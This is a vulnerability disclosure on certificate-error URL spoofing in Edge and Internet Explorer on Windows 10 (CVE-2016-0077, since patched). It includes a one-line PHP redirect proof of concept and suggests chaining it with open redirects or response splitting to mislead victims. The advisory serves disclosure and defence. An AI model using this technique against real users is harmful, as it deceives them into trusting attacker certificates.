Microsoft Edge/Internet Explorer Certificate Error Url Spoofing

Tested on Windows 10 x64
Edge Version: 20.10240.16384.0
Internet Explorer Version: 11.0.10240.16431

Overview:

Microsoft Edge is a web browser developed by Microsoft and included in the company's Windows 10 operating systems, replacing Internet Explorer as the default web browser on all device classes.

https://en.wikipedia.org/wiki/Microsoft_Edge

https://www.microsoft.com/en-us/windows/microsoft-edge

&

Internet Explorer is a series of graphical web browsers developed by Microsoft and included as part of the Microsoft Windows line of operating systems, starting in 1995. It was first released as part of the add-on package Plus! for Windows 95 that year. Later versions were available as free downloads, or in service packs, and included in the Original Equipment Manufacturer (OEM) service releases of Windows 95 and later versions of Windows.

https://en.wikipedia.org/wiki/Internet_Explorer

http://windows.microsoft.com/en-us/internet-explorer/

Vulnerability description:

What presents these screenshots? The certificate error on domain http://kacperrybczynski.com/? No! (tip: certificate error over http ?)

Error concerning the certificate but occurs in another domain (not http://kacperrybczynski.com/), but where??

The browser interprets headers first, then current url and more... Spoofing works when in response Edge/IE receive "Location:" parameter, (HTTP 302).

How it can be used in nature? Simply by using Open Redirect vulnerability or HTTP Response Splitting to trick victim to accept unsecure certificate by the trust to domain visible in URI.

PoC:

http://kacperrybczynski.com/research/microsoft_edge_certificate_error_url_spoof/poc/

PoC source code:

<?php
header("Location: https://elo.devilteam.pl/");
?>

Reference:

https://en.wikipedia.org/wiki/Spoofed_URL

Disclosure Timeline:

2015-10-27 - Vulnerability reported to vendor

2016-02-19 - CVE-2016-0077

2016-02-19 - Release fix in Microsoft Security Bulletin MS16-009/MS16-011

Reported by:

Kacper RybczyƄski (@kacperybczynski)